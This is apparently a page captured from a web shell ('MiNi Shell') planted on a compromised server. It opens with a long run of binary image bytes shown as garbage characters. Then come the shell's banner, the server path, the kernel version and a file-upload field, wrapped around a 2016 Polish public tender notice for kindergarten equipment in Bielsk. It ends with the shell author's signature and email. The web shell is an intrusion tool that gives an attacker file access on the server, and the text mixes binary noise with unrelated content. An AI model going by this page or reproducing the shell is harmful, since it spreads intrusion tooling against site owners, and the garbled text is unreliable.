JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160726/156175-N-2016.html

<p class="kh_header"><b>Bielsk: ZAKUP WYPOSAŻENIA DO SAMORZĄDOWEGO PRZEDSZKOLA  W BIELSKU</b><br>
<b>Numer ogłoszenia: 156175 - 2016; data zamieszczenia: 26.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bielsk , Plac Wolności 3A, 09-230 Bielsk, woj. mazowieckie, tel. 24 265 01 01, faks 24 265 01 05.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> ugbielsk.bip.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP WYPOSAŻENIA DO SAMORZĄDOWEGO PRZEDSZKOLA  W BIELSKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i montaż wyposażenia do Przedszkola. Zakres zadania został podzielony na 4 części: 
a)	CZĘŚĆ I - węzeł kuchenny, 
b)	CZĘŚĆ II - meble
c)	CZĘŚĆ III - wyposażenie drobne 
d)	CZĘŚĆ IV - sprzęt, 
o parametrach zgodnych z opisem zawartym w załącznik nr 7a, 7b, 7c, 7d do SIWZ.

Wspólny Słownik Zamówień (CPV)
39.31.40.00-6	Przemysłowy sprzęt kuchenny
39.16.10.00-8	Meble przedszkolne
39.13.00.00-2	Meble biurowe
37.52.00.00-9	Zabawki
37.52.41.00-8	Gry edukacyjne
32.00.00.00-3	Sprzęt radiowy, telewizyjny, komunikacyjny, telekomunikacyjny i podobny

5.	W przypadku wskazania znaków towarowych i nazw producentów - Zamawiający informuje, że dopuszcza składanie ofert w których poszczególne urządzenia (dostawy) mogą być zastąpione urządzeniami  (dostawami) równoważnymi.
6. Zamawiający informuje, iż został złożony wniosek o uzyskanie dofinansowania na realizację powyższego zadania ze środków pochodzących z ogólnej rezerwy oświatowej.
Uwaga: 
W przypadku braku pozytywnego zakwalifikowania, przedmiot zamówienia w zakresie realizacji Części II, Części III, Części IV zostanie ograniczony do możliwości finansowych Zamawiającego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.31.40.00-6, 39.16.10.00-8, 39.13.00.00-2, 37.52.00.00-9, 37.52.41.00-8, 32.00.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta winna być zabezpieczona wadium dla:
a)	dla CZĘŚCI I - w wysokości 2.700,00 zł słownie: dwa tysiące siedemset złotych,
b)	dla CZĘŚCI II - w wysokości 2.200,00 zł słownie: dwa tysiące dwieście złotych,
c)	dla CZĘŚCI III -w wysokości 1.900,00 zł słownie: tysiąc dziewięćset złotych,
d)	dla CZĘŚCI IV - w wysokości 200,00 zł słownie: dwieście złotych,</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ramach tego warunku wykonawca zobowiązany jest do:
złożenia oświadczenia, że wykonawca spełnia warunki określone w art. 22 ust. 1 wskazanej ustawy - wg załącznika nr 3</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-złożenia oświadczenia, że wykonawca spełnia warunki określone w art. 22 ust. 1 wskazanej ustawy - wg załącznika nr 3 
-wykazania, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych dostaw tj.:
-dla CZĘŚCI I - wykonał lub wykonuje minimum: jedną dostawę wyposażenia w urządzenia węzła kuchennego w budynku użyteczności publicznej o wartości minimum 80.000,00 zł brutto; 
-dla CZĘŚCI II - wykonał lub wykonuje minimum: jedną dostawę wyposażenia w meble w budynku użyteczności publicznej o wartości minimum 50.000,00 zł brutto;
-dla CZĘŚCI III - wykonał lub wykonuje minimum: jedną dostawę wyposażenia drobnego odpowiadającego swoim rodzajem co przedmiot zamówienia w budynku użyteczności publicznej o wartości minimum 30.000,00 zł brutto;
-dla CZĘŚCI IV - wykonał lub wykonuje minimum: jedną dostawę wyposażenia w sprzęt elektroniczny w budynku użyteczności publicznej o wartości minimum 7.000,00 zł brutto.
wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane  oraz załączy dowody potwierdzające, że zostały wykonane lub są wykonywane należycie.
Uwaga: 
W przypadku gdy Wykonawca składa ofertę jedną na jedno lub dwa lub trzy lub cztery z wymienionych dostaw, wówczas zobowiązany jest przedstawić doświadczenie wymagane odpowiednio dla każdej części.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ramach tego warunku wykonawca zobowiązany jest do: 
-złożenia oświadczenia, że wykonawca spełnia warunki określone w art. 22 ust. 1 wskazanej ustawy - wg załącznika nr 3</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ramach tego warunku wykonawca zobowiązany jest do: 
-złożenia oświadczenia, że wykonawca spełnia warunki określone w art. 22 ust. 1 wskazanej ustawy - wg załącznika nr 3</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ramach tego warunku wykonawca zobowiązany jest do: 
-złożenia oświadczenia, że wykonawca spełnia warunki określone w art. 22 ust. 1 wskazanej ustawy - wg załącznika nr 3</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.OFERTA WINNA ZAWIERAĆ:
a)wypełniony i podpisany formularz oferty (wg załącznika nr 1).
b)odpowiednio: (o ile jest to możliwe) kserokopie dokumentu wadialnego lub w przypadku wpłaty wadium w pieniądzu kserokopię przelewu potwierdzającego wniesienie wadium w pieniądzu.
c)W przypadku złożenia oferty wspólnej - pełnomocnictwo udzielone Pełnomocnikowi (np. Liderowi , przedstawicielowi , partnerowi wiodącemu) do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarciu umowy
d)dokumenty i oświadczenia wymienione w pkt. VI. SIWZ, potwierdzające spełnienie przez Wykonawców warunków udziału w postępowaniu, wymienionych w pkt. V. SIWZ.
e)Wycena wg. załącznika nr 2 - odpowiednio na część . części składaną.e w ofercie</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 88.00</li>
<li>2 - gwarancja - 12.00</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych przewiduje możliwość dokonywania zmian w treści zawartej umowy w następujących przypadkach: 
1)	zmiany terminu wykonania Umowy w przypadku, gdy: 
-zaistniały przyczyny niezależne od działania stron, których przy zachowaniu wszelkich należytych środków nie można uniknąć ani im zapobiec;
-nastąpiła siła wyższa obejmująca: klęski żywiołowe, niewypały, niewybuchy, wykopaliska archeologiczne, gwałtowne opady, gradobicie, powodzie i inne anomalia klimatyczne.
-Zamawiający nie udostępnił pomieszczeń w celu wykonania przedmiotu zamówienia tj. montażu dostaw.
2) zmiany numeru konta lub osób reprezentujących w przypadku zmian organizacyjnych; 
3) wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć pomimo zachowania należytej staranności;
4) kolorystyki dostaw. 
5) zmiana sposobu wykonania zamówienia- zmiany technologiczne:

-niedostępność na rynku materiałów/urządzeń wskazanych w opisie przedmiotu zamówienia spowodowana zaprzestaniem produkcji lub wycofaniem ich z rynku przez producenta na inne o parametrach nie gorszych niż zaoferowane w ofercie i spełniające wymagania zawarte w SIWZ, 
-pojawienie się na rynku materiałów nowej generacji albo nowych technologii wykonania pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy, 
-konieczność zrealizowania zamówienia przy zastosowaniu innych rozwiązań materiałowych niż wskazane w opisie przedmiotu zamówienia, w sytuacji gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem zamówienia, 
-konieczność zrealizowania zamówienia przy zastosowaniu innych rozwiązań materiałowych ze względu na zmiany obowiązującego prawa 
6) Warunkiem dokonania zmiany jest przedłożenie przez jedną ze Stron umowy drugiej Stronie wniosku o dokonanie zmiany wraz z pisemnym uzasadnieniem i/lub stosownym dokumentem potwierdzającym zasadność dokonania tej zmiany.
 
2.Prawa i obowiązki wynikające z niniejszej umowy nie mogą być przeniesione na rzecz osób trzecich.
3.Strony niniejszej umowy mają obowiązek wzajemnego informowania się o wszelkich zmianach statusu prawnego, sytuacji finansowej, o wszczęciu postępowania likwidacyjnego, układowego lub upadłościowego oraz o innych zmianach mających  wpływ na treść i wykonywanie niniejszej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ugbielsk.bip.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Bielsku
Plac Wolności 3A
09-230 Bielsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2016 godzina 09:00, miejsce: Urząd Gminy w Bielsku
Plac Wolności 3A
09-230 Bielsk
pokój nr 111 /Sekretariat/ I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZAKUP WYPOSAŻENIA DO SAMORZĄDOWEGO PRZEDSZKOLA  W BIELSKU
a)	CZĘŚĆ I - węzeł kuchenny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i montaż wyposażenia do Przedszkola. Zakres zadania został podzielony na 4 części: w tym
a)	CZĘŚĆ I - węzeł kuchenny, 
o parametrach zgodnych z opisem zawartym w załącznik nr 7a do SIWZ.
5.	W przypadku wskazania znaków towarowych i nazw producentów - Zamawiający informuje, że dopuszcza składanie ofert w których poszczególne urządzenia (dostawy) mogą być zastąpione urządzeniami  (dostawami) równoważnymi.
6. Zamawiający informuje, iż został złożony wniosek o uzyskanie dofinansowania na realizację powyższego zadania ze środków pochodzących z ogólnej rezerwy oświatowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.31.40.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 88.00</li>
<li>2. Gwarancja - 12.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup wyposażenia do Samorządowego Przedszkola  w Bielsku
b)	CZĘŚĆ II - meble.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i montaż wyposażenia do Przedszkola. Zakres zadania został podzielony na 4 części:  
b)	CZĘŚĆ II - meble 
o parametrach zgodnych z opisem zawartym w załącznik nr 7b do SIWZ.
5.	W przypadku wskazania znaków towarowych i nazw producentów - Zamawiający informuje, że dopuszcza składanie ofert w których poszczególne urządzenia (dostawy) mogą być zastąpione urządzeniami  (dostawami) równoważnymi.
6. Zamawiający informuje, iż został złożony wniosek o uzyskanie dofinansowania na realizację powyższego zadania ze środków pochodzących z ogólnej rezerwy oświatowej.
Uwaga: 
W przypadku braku pozytywnego zakwalifikowania, przedmiot zamówienia w zakresie realizacji Części II, Części III, Części IV zostanie ograniczony do możliwości finansowych Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.10.00-8, 39.13.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 88.00</li>
<li>2. Gwarancja - 12.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup wyposażenia do Samorządowego Przedszkola  w Bielsku
c)	CZĘŚĆ III - wyposażenie drobne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i montaż wyposażenia do Przedszkola. Zakres zadania został podzielony na 4 części: 
c)	CZĘŚĆ III - wyposażenie drobne 
o parametrach zgodnych z opisem zawartym w załącznik nr 7c do SIWZ.
5.	W przypadku wskazania znaków towarowych i nazw producentów - Zamawiający informuje, że dopuszcza składanie ofert w których poszczególne urządzenia (dostawy) mogą być zastąpione urządzeniami  (dostawami) równoważnymi.
6. Zamawiający informuje, iż został złożony wniosek o uzyskanie dofinansowania na realizację powyższego zadania ze środków pochodzących z ogólnej rezerwy oświatowej.
Uwaga: 
W przypadku braku pozytywnego zakwalifikowania, przedmiot zamówienia w zakresie realizacji Części II, Części III, Części IV zostanie ograniczony do możliwości finansowych Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.52.00.00-9, 37.52.41.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 88.00</li>
<li>2. Gwarancja - 12.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakup wyposażenia do Samorządowego Przedszkola  w Bielsku
d)	CZĘŚĆ IV - sprzęt,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i montaż wyposażenia do Przedszkola. Zakres zadania został podzielony na 4 części: 
d)	CZĘŚĆ IV - sprzęt, 
o parametrach zgodnych z opisem zawartym w załącznik nr 7d do SIWZ.
5.	W przypadku wskazania znaków towarowych i nazw producentów - Zamawiający informuje, że dopuszcza składanie ofert w których poszczególne urządzenia (dostawy) mogą być zastąpione urządzeniami  (dostawami) równoważnymi.
6. Zamawiający informuje, iż został złożony wniosek o uzyskanie dofinansowania na realizację powyższego zadania ze środków pochodzących z ogólnej rezerwy oświatowej.
Uwaga: 
W przypadku braku pozytywnego zakwalifikowania, przedmiot zamówienia w zakresie realizacji Części II, Części III, Części IV zostanie ograniczony do możliwości finansowych Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.00.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 88.00</li>
<li>2. Gwarancja - 12.00</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com